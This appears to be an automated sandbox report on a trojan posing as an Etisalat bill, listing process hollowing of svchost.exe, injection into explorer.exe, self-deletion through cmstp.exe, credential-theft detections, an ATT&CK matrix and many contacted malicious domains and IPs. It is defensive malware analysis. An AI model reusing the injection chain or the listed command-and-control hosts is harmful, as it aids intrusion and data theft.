Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: AD0000
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3D5008
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB8C93 LogonUserW
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC4EF5 mouse_event
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, explorer.exe, 00000003.00000000.1987387390.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4436303863.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1984929621.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.1984137614.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4435480864.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B8886B cpuid 0_2_00B8886B
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B950D7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BA2230 GetUserNameW,0_2_00BA2230
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B9418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B9418A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B64AFE

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_81
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_XP
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_XPe
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_VISTA
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_7
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: WIN_8
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BD6596
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BD6A5A
          MITRE ATT&CK Matrix (one row per line; a leading number is the count of matched signatures for that technique)

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 1 Shared Modules | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 3 Command and Scripting Interpreter | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 115 System Information Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 612 Process Injection | 2 Valid Accounts | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 612 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph ID: 1448570 | Sample: Details of Your Etisalat Su... | Startdate: 28/05/2024 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.vietcadao.com; www.usedata.monster; 11 other IPs or domains
            Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
            started: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
          Details of Your Etisalat Summary Bill for the Month of May 2024.exe
            Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
            started: svchost.exe
          svchost.exe
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
            injected: explorer.exe
          explorer.exe
            DNS/IP: www.myconc.pro 169.239.128.46, 49714, 80 ZAPPIE-HOST-ASZappieHostGB Seychelles; www.vietcadao.com 103.224.212.212, 49710, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; 3 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit)
            started: cmstp.exe
          cmstp.exe
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            started: cmd.exe
          cmd.exe
            started: conhost.exe



          Source | Detection | Scanner | Label | Link
          Details of Your Etisalat Summary Bill for the Month of May 2024.exe | 37% | ReversingLabs | Win32.Trojan.Strab |
          Details of Your Etisalat Summary Bill for the Month of May 2024.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://word.office.comon | 0% | URL Reputation | safe |
          https://powerpoint.office.comcember | 0% | URL Reputation | safe |
          https://excel.office.com | 0% | URL Reputation | safe |
          http://schemas.micro | 0% | URL Reputation | safe |
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe |
          https://wns.windows.com/)s | 0% | URL Reputation | safe |
          https://outlook.com | 0% | URL Reputation | safe |
          http://www.flickzbiz.fun/da29/ | 0% | Avira URL Cloud | safe |
          http://www.1wxir.com | 0% | Avira URL Cloud | safe |
          http://www.vietcadao.comReferer: | 0% | Avira URL Cloud | safe |
          https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
          http://www.sercettopper.comReferer: | 0% | Avira URL Cloud | safe |
          https://api.msn.com/ | 0% | URL Reputation | safe |
          http://www.1wxir.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.kas-travel.com/da29/www.mediatechnologysolutions.com | 0% | Avira URL Cloud | safe |
          http://crl.v | 0% | URL Reputation | safe |
          http://www.aerotyneholdings.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.kas-travel.com | 0% | Avira URL Cloud | safe |
          www.1wxir.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.1wxir.com/da29/www.rlyadventures.com | 0% | Avira URL Cloud | safe |
          http://www.usedata.monster/da29/ | 0% | Avira URL Cloud | safe |
          http://www.myconc.pro/da29/ | 0% | Avira URL Cloud | safe |
          http://www.rlyadventures.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.openshiftstore.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.953700958.com/da29/www.iransarafan.com | 0% | Avira URL Cloud | safe |
          http://www.cucinaconestilo.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.vietcadao.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.usedata.monster | 0% | Avira URL Cloud | safe |
          http://www.vietcadao.com | 0% | Avira URL Cloud | safe |
          http://www.cucinaconestilo.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.vietcadao.com/da29/www.micheleditrana.com | 0% | Avira URL Cloud | safe |
          http://www.openshiftstore.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.myconc.pro | 0% | Avira URL Cloud | safe |
          http://www.mediatechnologysolutions.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.micheleditrana.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.iransarafan.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.veriosg.xyz/da29/www.sercettopper.com | 0% | Avira URL Cloud | safe |
          http://www.sercettopper.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.953700958.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.micheleditrana.com/da29/www.aerotyneholdings.com | 0% | Avira URL Cloud | safe |
          http://www.flickzbiz.funReferer: | 0% | Avira URL Cloud | safe |
          http://www.usedata.monster/da29/www.vietcadao.com | 0% | Avira URL Cloud | safe |
          http://www.kas-travel.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.aerotyneholdings.com/da29/www.1wxir.com | 0% | Avira URL Cloud | safe |
          http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe |
          http://www.mediatechnologysolutions.com | 0% | Avira URL Cloud | safe |
          http://www.myconc.pro/da29/www.flickzbiz.fun | 0% | Avira URL Cloud | safe |
          http://www.veriosg.xyz/da29/ | 0% | Avira URL Cloud | safe |
          http://www.flickzbiz.fun/da29/www.openshiftstore.com | 0% | Avira URL Cloud | safe |
          http://www.micheleditrana.com | 0% | Avira URL Cloud | safe |
          http://www.rlyadventures.com | 0% | Avira URL Cloud | safe |
          http://www.cucinaconestilo.com/da29/e | 0% | Avira URL Cloud | safe |
          http://www.usedata.monsterReferer: | 0% | Avira URL Cloud | safe |
          http://www.mediatechnologysolutions.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.1wxir.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.iransarafan.com | 0% | Avira URL Cloud | safe |
          http://www.flickzbiz.fun | 0% | Avira URL Cloud | safe |
          http://www.rlyadventures.com/da29/www.myconc.pro | 0% | Avira URL Cloud | safe |
          http://www.953700958.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.myconc.proReferer: | 0% | Avira URL Cloud | safe |
          http://www.mediatechnologysolutions.com/da29/www.953700958.com | 0% | Avira URL Cloud | safe |
          http://www.aerotyneholdings.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.veriosg.xyz | 0% | Avira URL Cloud | safe |
          http://www.kas-travel.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.rlyadventures.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.iransarafan.com/da29/www.cucinaconestilo.com | 0% | Avira URL Cloud | safe |
          http://www.953700958.com | 0% | Avira URL Cloud | safe |
          http://www.sercettopper.com/da29/www.kas-travel.com | 0% | Avira URL Cloud | safe |
          http://www.iransarafan.com/da29/ | 0% | Avira URL Cloud | safe |
          http://www.openshiftstore.com/da29/www.veriosg.xyz | 0% | Avira URL Cloud | safe |
          http://www.sercettopper.com | 0% | Avira URL Cloud | safe |
          http://www.veriosg.xyzReferer: | 0% | Avira URL Cloud | safe |
          http://www.micheleditrana.comReferer: | 0% | Avira URL Cloud | safe |
          http://www.aerotyneholdings.com | 0% | Avira URL Cloud | safe |
          http://www.cucinaconestilo.com | 0% | Avira URL Cloud | safe |
          http://www.openshiftstore.com | 0% | Avira URL Cloud | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.1wxir.com | 190.115.24.78 | true | true | | unknown
          openshiftstore.com | 45.137.159.230 | true | true | | unknown
          www.myconc.pro | 169.239.128.46 | true | true | | unknown
          www.aerotyneholdings.com | 13.248.169.48 | true | true | | unknown
          micheleditrana.com | 76.223.105.230 | true | true | | unknown
          www.kas-travel.com | 155.248.232.116 | true | true | | unknown
          www.vietcadao.com | 103.224.212.212 | true | true | | unknown
          www.flickzbiz.fun | unknown | unknown | true | | unknown
          www.usedata.monster | unknown | unknown | true | | unknown
          www.rlyadventures.com | unknown | unknown | true | | unknown
          www.micheleditrana.com | unknown | unknown | true | | unknown
          www.openshiftstore.com | unknown | unknown | true | | unknown
          www.sercettopper.com | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          www.1wxir.com/da29/ | true | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://word.office.comon | explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.vietcadao.comReferer: | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.aerotyneholdings.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.kas-travel.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.1wxir.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.1wxir.com/da29/www.rlyadventures.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.flickzbiz.fun/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.1wxir.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.sercettopper.comReferer: | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://powerpoint.office.comcember | explorer.exe, 00000003.00000002.4441907247.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1996092451.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.kas-travel.com/da29/www.mediatechnologysolutions.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.usedata.monster/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.cucinaconestilo.comReferer: | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.myconc.pro/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.rlyadventures.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.vietcadao.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://excel.office.com | explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.953700958.com/da29/www.iransarafan.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.usedata.monster | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.vietcadao.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.micro | explorer.exe, 00000003.00000002.4439072490.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439468324.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439499553.0000000008890000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.openshiftstore.comReferer: | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.cucinaconestilo.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.vietcadao.com/da29/www.micheleditrana.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.mediatechnologysolutions.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.micheleditrana.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.openshiftstore.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.myconc.pro | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.iransarafan.comReferer: | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.953700958.com/da29/ | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
